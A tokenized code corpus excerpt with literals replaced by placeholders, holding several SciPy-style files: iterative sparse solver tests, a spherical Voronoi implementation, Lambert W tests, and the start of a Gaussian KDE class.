: '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:h>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> bessel_norms = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> from . isolve import * <EOL> from . dsolve import * <EOL> from . interface import * <EOL> from . eigen import * <EOL> from . matfuncs import * <EOL> from . _onenormest import * <EOL> from . _norm import * <EOL> from . _expm_multiply import * <EOL> __all__ = [ s for s in dir ( ) if not s . startswith ( '<STR_LIT:_>' ) ] <EOL> from numpy . testing import Tester <EOL> test = Tester ( ) . test <EOL> bench = Tester ( ) . bench </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import warnings <EOL> import numpy as np <EOL> from numpy . testing import ( TestCase , assert_equal , assert_array_equal , <EOL> assert_ , assert_allclose , assert_raises , run_module_suite ) <EOL> from numpy import zeros , arange , array , abs , max , ones , eye , iscomplexobj <EOL> from scipy . linalg import norm <EOL> from scipy . sparse import spdiags , csr_matrix , SparseEfficiencyWarning <EOL> from scipy . sparse . linalg import LinearOperator , aslinearoperator <EOL> from scipy . sparse . linalg . isolve import cg , cgs , bicg , bicgstab , gmres , qmr , minres , lgmres <EOL> class Case ( object ) : <EOL> def __init__ ( self , name , A , skip = None ) : <EOL> self . name = name <EOL> self . A = A <EOL> if skip is None : <EOL> self . skip = [ ] <EOL> else : <EOL> self . skip = skip <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class IterativeParams ( object ) : <EOL> def __init__ ( self ) : <EOL> solvers = [ cg , cgs , bicg , bicgstab , gmres , qmr , minres , lgmres ] <EOL> sym_solvers = [ minres , cg ] <EOL> posdef_solvers = [ cg ] <EOL> real_solvers = [ minres ] <EOL> self . solvers = solvers <EOL> self . cases = [ ] <EOL> N = <NUM_LIT> <EOL> data = ones ( ( <NUM_LIT:3> , N ) ) <EOL> data [ <NUM_LIT:0> , : ] = <NUM_LIT:2> <EOL> data [ <NUM_LIT:1> , : ] = - <NUM_LIT:1> <EOL> data [ <NUM_LIT:2> , : ] = - <NUM_LIT:1> <EOL> Poisson1D = spdiags ( data , [ <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:1> ] , N , N , format = '<STR_LIT>' ) <EOL> self . Poisson1D = Case ( "<STR_LIT>" , Poisson1D ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , Poisson1D ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , Poisson1D . astype ( '<STR_LIT:f>' ) , <EOL> skip = [ minres ] ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , - Poisson1D , <EOL> skip = posdef_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , ( - Poisson1D ) . astype ( '<STR_LIT:f>' ) , <EOL> skip = posdef_solvers + [ minres ] ) ) <EOL> data = array ( [ [ <NUM_LIT:6> , - <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:7> , - <NUM_LIT:1> , <NUM_LIT:10> , <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:8> , <NUM_LIT:9> ] ] , dtype = '<STR_LIT:d>' ) <EOL> RandDiag = spdiags ( data , [ <NUM_LIT:0> ] , <NUM_LIT:10> , <NUM_LIT:10> , format = '<STR_LIT>' ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , RandDiag , skip = posdef_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , RandDiag . astype ( '<STR_LIT:f>' ) , <EOL> skip = posdef_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , skip = posdef_solvers + sym_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:f>' ) , <EOL> skip = posdef_solvers + sym_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> data = data + data . T <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , skip = posdef_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:f>' ) , <EOL> skip = posdef_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:9> , <NUM_LIT:9> ) <EOL> data = np . dot ( data . conj ( ) , data . T ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:f>' ) , <EOL> skip = [ minres ] ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) + <NUM_LIT> * np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , <EOL> skip = posdef_solvers + sym_solvers + real_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:F>' ) , <EOL> skip = posdef_solvers + sym_solvers + real_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) + <NUM_LIT> * np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> data = data + data . T . conj ( ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , <EOL> skip = posdef_solvers + real_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:F>' ) , <EOL> skip = posdef_solvers + real_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:9> , <NUM_LIT:9> ) + <NUM_LIT> * np . random . rand ( <NUM_LIT:9> , <NUM_LIT:9> ) <EOL> data = np . dot ( data . conj ( ) , data . T ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , skip = real_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:F>' ) , <EOL> skip = real_solvers ) ) <EOL> data = ones ( ( <NUM_LIT:2> , <NUM_LIT:10> ) ) <EOL> data [ <NUM_LIT:0> , : ] = <NUM_LIT:2> <EOL> data [ <NUM_LIT:1> , : ] = - <NUM_LIT:1> <EOL> A = spdiags ( data , [ <NUM_LIT:0> , - <NUM_LIT:1> ] , <NUM_LIT:10> , <NUM_LIT:10> , format = '<STR_LIT>' ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , A , <EOL> skip = sym_solvers + [ cgs , qmr , bicg ] ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , A . astype ( '<STR_LIT:F>' ) , <EOL> skip = sym_solvers + [ cgs , qmr , bicg ] ) ) <EOL> params = None <EOL> def setup_module ( ) : <EOL> global params <EOL> params = IterativeParams ( ) <EOL> def check_maxiter ( solver , case ) : <EOL> A = case . A <EOL> tol = <NUM_LIT> <EOL> b = arange ( A . shape [ <NUM_LIT:0> ] , dtype = float ) <EOL> x0 = <NUM_LIT:0> * b <EOL> residuals = [ ] <EOL> def callback ( x ) : <EOL> residuals . append ( norm ( b - case . A * x ) ) <EOL> x , info = solver ( A , b , x0 = x0 , tol = tol , maxiter = <NUM_LIT:3> , callback = callback ) <EOL> assert_equal ( len ( residuals ) , <NUM_LIT:3> ) <EOL> assert_equal ( info , <NUM_LIT:3> ) <EOL> def test_maxiter ( ) : <EOL> case = params . Poisson1D <EOL> for solver in params . solvers : <EOL> if solver in case . skip : <EOL> continue <EOL> yield check_maxiter , solver , case <EOL> def assert_normclose ( a , b , tol = <NUM_LIT> ) : <EOL> residual = norm ( a - b ) <EOL> tolerance = tol * norm ( b ) <EOL> msg = "<STR_LIT>" % ( residual , tolerance ) <EOL> assert_ ( residual < tolerance , msg = msg ) <EOL> def check_convergence ( solver , case ) : <EOL> A = case . A <EOL> if A . dtype . char in "<STR_LIT>" : <EOL> tol = <NUM_LIT> <EOL> else : <EOL> tol = <NUM_LIT> <EOL> b = arange ( A . shape [ <NUM_LIT:0> ] , dtype = A . dtype ) <EOL> x0 = <NUM_LIT:0> * b <EOL> x , info = solver ( A , b , x0 = x0 , tol = tol ) <EOL> assert_array_equal ( x0 , <NUM_LIT:0> * b ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_normclose ( A . dot ( x ) , b , tol = tol ) <EOL> def test_convergence ( ) : <EOL> for solver in params . solvers : <EOL> for case in params . cases : <EOL> if solver in case . skip : <EOL> continue <EOL> yield check_convergence , solver , case <EOL> def check_precond_dummy ( solver , case ) : <EOL> tol = <NUM_LIT> <EOL> def identity ( b , which = None ) : <EOL> """<STR_LIT>""" <EOL> return b <EOL> A = case . A <EOL> M , N = A . shape <EOL> D = spdiags ( [ <NUM_LIT:1.0> / A . diagonal ( ) ] , [ <NUM_LIT:0> ] , M , N ) <EOL> b = arange ( A . shape [ <NUM_LIT:0> ] , dtype = float ) <EOL> x0 = <NUM_LIT:0> * b <EOL> precond = LinearOperator ( A . shape , identity , rmatvec = identity ) <EOL> if solver is qmr : <EOL> x , info = solver ( A , b , M1 = precond , M2 = precond , x0 = x0 , tol = tol ) <EOL> else : <EOL> x , info = solver ( A , b , M = precond , x0 = x0 , tol = tol ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_normclose ( A . dot ( x ) , b , tol ) <EOL> A = aslinearoperator ( A ) <EOL> A . psolve = identity <EOL> A . rpsolve = identity <EOL> x , info = solver ( A , b , x0 = x0 , tol = tol ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_normclose ( A * x , b , tol = tol ) <EOL> def test_precond_dummy ( ) : <EOL> case = params . Poisson1D <EOL> for solver in params . solvers : <EOL> if solver in case . skip : <EOL> continue <EOL> yield check_precond_dummy , solver , case <EOL> def test_gmres_basic ( ) : <EOL> A = np . vander ( np . arange ( <NUM_LIT:10> ) + <NUM_LIT:1> ) [ : , : : - <NUM_LIT:1> ] <EOL> b = np . zeros ( <NUM_LIT:10> ) <EOL> b [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> x = np . linalg . solve ( A , b ) <EOL> x_gm , err = gmres ( A , b , restart = <NUM_LIT:5> , maxiter = <NUM_LIT:1> ) <EOL> assert_allclose ( x_gm [ <NUM_LIT:0> ] , <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_reentrancy ( ) : <EOL> non_reentrant = [ cg , cgs , bicg , bicgstab , gmres , qmr ] <EOL> reentrant = [ lgmres , minres ] <EOL> for solver in reentrant + non_reentrant : <EOL> yield _check_reentrancy , solver , solver in reentrant <EOL> def _check_reentrancy ( solver , is_reentrant ) : <EOL> def matvec ( x ) : <EOL> A = np . array ( [ [ <NUM_LIT:1.0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] ] ) <EOL> y , info = solver ( A , x ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> return y <EOL> b = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1.> / <NUM_LIT:2> , <NUM_LIT:1.> / <NUM_LIT:3> ] ) <EOL> op = LinearOperator ( ( <NUM_LIT:3> , <NUM_LIT:3> ) , matvec = matvec , rmatvec = matvec , <EOL> dtype = b . dtype ) <EOL> if not is_reentrant : <EOL> assert_raises ( RuntimeError , solver , op , b ) <EOL> else : <EOL> y , info = solver ( op , b ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_allclose ( y , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> class TestQMR ( TestCase ) : <EOL> def test_leftright_precond ( self ) : <EOL> """<STR_LIT>""" <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" , category = SparseEfficiencyWarning ) <EOL> from scipy . sparse . linalg . dsolve import splu <EOL> from scipy . sparse . linalg . interface import LinearOperator <EOL> n = <NUM_LIT:100> <EOL> dat = ones ( n ) <EOL> A = spdiags ( [ - <NUM_LIT:2> * dat , <NUM_LIT:4> * dat , - dat ] , [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , n , n ) <EOL> b = arange ( n , dtype = '<STR_LIT:d>' ) <EOL> L = spdiags ( [ - dat / <NUM_LIT:2> , dat ] , [ - <NUM_LIT:1> , <NUM_LIT:0> ] , n , n ) <EOL> U = spdiags ( [ <NUM_LIT:4> * dat , - dat ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] , n , n ) <EOL> L_solver = splu ( L ) <EOL> U_solver = splu ( U ) <EOL> def L_solve ( b ) : <EOL> return L_solver . solve ( b ) <EOL> def U_solve ( b ) : <EOL> return U_solver . solve ( b ) <EOL> def LT_solve ( b ) : <EOL> return L_solver . solve ( b , '<STR_LIT:T>' ) <EOL> def UT_solve ( b ) : <EOL> return U_solver . solve ( b , '<STR_LIT:T>' ) <EOL> M1 = LinearOperator ( ( n , n ) , matvec = L_solve , rmatvec = LT_solve ) <EOL> M2 = LinearOperator ( ( n , n ) , matvec = U_solve , rmatvec = UT_solve ) <EOL> x , info = qmr ( A , b , tol = <NUM_LIT> , maxiter = <NUM_LIT:15> , M1 = M1 , M2 = M2 ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_normclose ( A * x , b , tol = <NUM_LIT> ) <EOL> class TestGMRES ( TestCase ) : <EOL> def test_callback ( self ) : <EOL> def store_residual ( r , rvec ) : <EOL> rvec [ rvec . nonzero ( ) [ <NUM_LIT:0> ] . max ( ) + <NUM_LIT:1> ] = r <EOL> A = csr_matrix ( array ( [ [ - <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:2> ] ] ) ) <EOL> b = ones ( ( A . shape [ <NUM_LIT:0> ] , ) ) <EOL> maxiter = <NUM_LIT:1> <EOL> rvec = zeros ( maxiter + <NUM_LIT:1> ) <EOL> rvec [ <NUM_LIT:0> ] = <NUM_LIT:1.0> <EOL> callback = lambda r : store_residual ( r , rvec ) <EOL> x , flag = gmres ( A , b , x0 = zeros ( A . shape [ <NUM_LIT:0> ] ) , tol = <NUM_LIT> , maxiter = maxiter , callback = callback ) <EOL> diff = max ( abs ( ( rvec - array ( [ <NUM_LIT:1.0> , <NUM_LIT> ] ) ) ) ) <EOL> assert_ ( diff < <NUM_LIT> ) <EOL> def test_abi ( self ) : <EOL> A = eye ( <NUM_LIT:2> ) <EOL> b = ones ( <NUM_LIT:2> ) <EOL> r_x , r_info = gmres ( A , b ) <EOL> r_x = r_x . astype ( complex ) <EOL> x , info = gmres ( A . astype ( complex ) , b . astype ( complex ) ) <EOL> assert_ ( iscomplexobj ( x ) ) <EOL> assert_allclose ( r_x , x ) <EOL> assert_ ( r_info == info ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import numpy . matlib <EOL> import scipy <EOL> import itertools <EOL> from scipy . _lib . _version import NumpyVersion <EOL> HAS_NUMPY_VEC_DET = ( NumpyVersion ( np . __version__ ) >= '<STR_LIT>' ) <EOL> __all__ = [ '<STR_LIT>' ] <EOL> def calc_circumcenters ( tetrahedrons ) : <EOL> """<STR_LIT>""" <EOL> num = tetrahedrons . shape [ <NUM_LIT:0> ] <EOL> a = np . concatenate ( ( tetrahedrons , np . ones ( ( num , <NUM_LIT:4> , <NUM_LIT:1> ) ) ) , axis = <NUM_LIT:2> ) <EOL> sums = np . sum ( tetrahedrons ** <NUM_LIT:2> , axis = <NUM_LIT:2> ) <EOL> d = np . concatenate ( ( sums [ : , : , np . newaxis ] , a ) , axis = <NUM_LIT:2> ) <EOL> dx = np . delete ( d , <NUM_LIT:1> , axis = <NUM_LIT:2> ) <EOL> dy = np . delete ( d , <NUM_LIT:2> , axis = <NUM_LIT:2> ) <EOL> dz = np . delete ( d , <NUM_LIT:3> , axis = <NUM_LIT:2> ) <EOL> if HAS_NUMPY_VEC_DET : <EOL> dx = np . linalg . det ( dx ) <EOL> dy = - np . linalg . det ( dy ) <EOL> dz = np . linalg . det ( dz ) <EOL> a = np . linalg . det ( a ) <EOL> else : <EOL> dx = np . array ( [ np . linalg . det ( m ) for m in dx ] ) <EOL> dy = - np . array ( [ np . linalg . det ( m ) for m in dy ] ) <EOL> dz = np . array ( [ np . linalg . det ( m ) for m in dz ] ) <EOL> a = np . array ( [ np . linalg . det ( m ) for m in a ] ) <EOL> nominator = np . vstack ( ( dx , dy , dz ) ) <EOL> denominator = <NUM_LIT:2> * a <EOL> return ( nominator / denominator ) . T <EOL> def project_to_sphere ( points , center , radius ) : <EOL> """<STR_LIT>""" <EOL> lengths = scipy . spatial . distance . cdist ( points , np . array ( [ center ] ) ) <EOL> return ( points - center ) / lengths * radius + center <EOL> class SphericalVoronoi : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , points , radius = None , center = None ) : <EOL> """<STR_LIT>""" <EOL> self . points = points <EOL> if np . any ( center ) : <EOL> self . center = center <EOL> else : <EOL> self . center = np . zeros ( <NUM_LIT:3> ) <EOL> if radius : <EOL> self . radius = radius <EOL> else : <EOL> self . radius = <NUM_LIT:1> <EOL> self . vertices = None <EOL> self . regions = None <EOL> self . _tri = None <EOL> self . _calc_vertices_regions ( ) <EOL> def _calc_vertices_regions ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _tri = scipy . spatial . ConvexHull ( self . points ) <EOL> tetrahedrons = self . _tri . points [ self . _tri . simplices ] <EOL> tetrahedrons = np . insert ( <EOL> tetrahedrons , <EOL> <NUM_LIT:3> , <EOL> np . array ( [ self . center ] ) , <EOL> axis = <NUM_LIT:1> <EOL> ) <EOL> circumcenters = calc_circumcenters ( tetrahedrons ) <EOL> self . vertices = project_to_sphere ( <EOL> circumcenters , <EOL> self . center , <EOL> self . radius <EOL> ) <EOL> generator_indices = np . arange ( self . points . shape [ <NUM_LIT:0> ] ) <EOL> filter_tuple = np . where ( ( np . expand_dims ( self . _tri . simplices , <EOL> - <NUM_LIT:1> ) == generator_indices ) . any ( axis = <NUM_LIT:1> ) ) <EOL> list_tuples_associations = zip ( filter_tuple [ <NUM_LIT:1> ] , <EOL> filter_tuple [ <NUM_LIT:0> ] ) <EOL> list_tuples_associations = sorted ( list_tuples_associations , <EOL> key = lambda t : t [ <NUM_LIT:0> ] ) <EOL> groups = [ ] <EOL> for k , g in itertools . groupby ( list_tuples_associations , <EOL> lambda t : t [ <NUM_LIT:0> ] ) : <EOL> groups . append ( [ element [ <NUM_LIT:1> ] for element in list ( g ) ] ) <EOL> self . regions = groups <EOL> def sort_vertices_of_regions ( self ) : <EOL> """<STR_LIT>""" <EOL> for n in range ( <NUM_LIT:0> , len ( self . regions ) ) : <EOL> remaining = self . regions [ n ] [ : ] <EOL> sorted_vertices = [ ] <EOL> current_simplex = remaining [ <NUM_LIT:0> ] <EOL> current_vertex = [ k for k in self . _tri . simplices [ current_simplex ] <EOL> if k != n ] [ <NUM_LIT:0> ] <EOL> remaining . remove ( current_simplex ) <EOL> sorted_vertices . append ( current_simplex ) <EOL> while remaining : <EOL> current_simplex = [ <EOL> s for s in remaining <EOL> if current_vertex in self . _tri . simplices [ s ] <EOL> ] [ <NUM_LIT:0> ] <EOL> current_vertex = [ <EOL> s for s in self . _tri . simplices [ current_simplex ] <EOL> if s != n and s != current_vertex <EOL> ] [ <NUM_LIT:0> ] <EOL> remaining . remove ( current_simplex ) <EOL> sorted_vertices . append ( current_simplex ) <EOL> self . regions [ n ] = sorted_vertices </s>
<s> from __future__ import division , print_function , absolute_import <EOL> import numpy as np <EOL> from numpy . testing import assert_ , assert_equal , assert_array_almost_equal <EOL> from scipy . special import lambertw <EOL> from numpy import nan , inf , pi , e , isnan , log , r_ , array , complex_ <EOL> from scipy . special . _testutils import FuncData <EOL> def test_values ( ) : <EOL> assert_ ( isnan ( lambertw ( nan ) ) ) <EOL> assert_equal ( lambertw ( inf , <NUM_LIT:1> ) . real , inf ) <EOL> assert_equal ( lambertw ( inf , <NUM_LIT:1> ) . imag , <NUM_LIT:2> * pi ) <EOL> assert_equal ( lambertw ( - inf , <NUM_LIT:1> ) . real , inf ) <EOL> assert_equal ( lambertw ( - inf , <NUM_LIT:1> ) . imag , <NUM_LIT:3> * pi ) <EOL> assert_equal ( lambertw ( <NUM_LIT:1.> ) , lambertw ( <NUM_LIT:1.> , <NUM_LIT:0> ) ) <EOL> data = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT:0> + <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> ( inf , <NUM_LIT:0> , inf ) , <EOL> ( <NUM_LIT:0> , - <NUM_LIT:1> , - inf ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , - inf ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:3> , - inf ) , <EOL> ( e , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( - pi / <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT> * pi / <NUM_LIT:2> ) , <EOL> ( - log ( <NUM_LIT:2> ) / <NUM_LIT:2> , <NUM_LIT:0> , - log ( <NUM_LIT:2> ) ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( - <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> ) , <EOL> ( - <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT> ) , <EOL> ( <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:4> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT> - <NUM_LIT> ) , <EOL> ( <NUM_LIT:1000> , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1000> , <NUM_LIT:1> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( <NUM_LIT:1000> , - <NUM_LIT:1> , <NUM_LIT> - <NUM_LIT> ) , <EOL> ( <NUM_LIT:1000> , <NUM_LIT:5> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( <NUM_LIT:3> + <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT> + <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( <NUM_LIT:3> + <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( <NUM_LIT:3> + <NUM_LIT> , - <NUM_LIT:1> , <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:0.5> , - <NUM_LIT:1> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , - <NUM_LIT:2> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , <NUM_LIT:4> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , <NUM_LIT:5> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:0> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , - <NUM_LIT:1> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:4> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:0> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , - <NUM_LIT:1> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:4> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( pi , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( - <NUM_LIT:0.5> + <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:0.5> - <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT> + <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT> - <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ] <EOL> data = array ( data , dtype = complex_ ) <EOL> def w ( x , y ) : <EOL> return lambertw ( x , y . real . astype ( int ) ) <EOL> olderr = np . seterr ( all = '<STR_LIT:ignore>' ) <EOL> try : <EOL> FuncData ( w , data , ( <NUM_LIT:0> , <NUM_LIT:1> ) , <NUM_LIT:2> , rtol = <NUM_LIT> , atol = <NUM_LIT> ) . check ( ) <EOL> finally : <EOL> np . seterr ( ** olderr ) <EOL> def test_ufunc ( ) : <EOL> assert_array_almost_equal ( <EOL> lambertw ( r_ [ <NUM_LIT:0.> , e , <NUM_LIT:1.> ] ) , r_ [ <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> ] ) <EOL> def test_lambertw_ufunc_loop_selection ( ) : <EOL> dt = np . dtype ( np . complex128 ) <EOL> assert_equal ( lambertw ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) . dtype , dt ) <EOL> assert_equal ( lambertw ( [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> ) . dtype , dt ) <EOL> assert_equal ( lambertw ( <NUM_LIT:0> , [ <NUM_LIT:0> ] , <NUM_LIT:0> ) . dtype , dt ) <EOL> assert_equal ( lambertw ( <NUM_LIT:0> , <NUM_LIT:0> , [ <NUM_LIT:0> ] ) . dtype , dt ) <EOL> assert_equal ( lambertw ( [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ) . dtype , dt ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> import warnings <EOL> from scipy . _lib . six import callable , string_types <EOL> from scipy import linalg , special <EOL> from numpy import atleast_2d , reshape , zeros , newaxis , dot , exp , pi , sqrt , ravel , power , atleast_1d , squeeze , sum , transpose <EOL> import numpy as np <EOL> from numpy . random import randint , multivariate_normal <EOL> from . import mvn <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class gaussian_kde ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dataset , bw_method = None ) : <EOL> self . dataset = atleast_2d ( dataset ) <EOL> if not self . dataset . size > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . d , self . n = self . dataset . shape <EOL> self . set_bandwidth ( bw_method = bw_method ) <EOL> def evaluate ( self , points ) : <EOL> 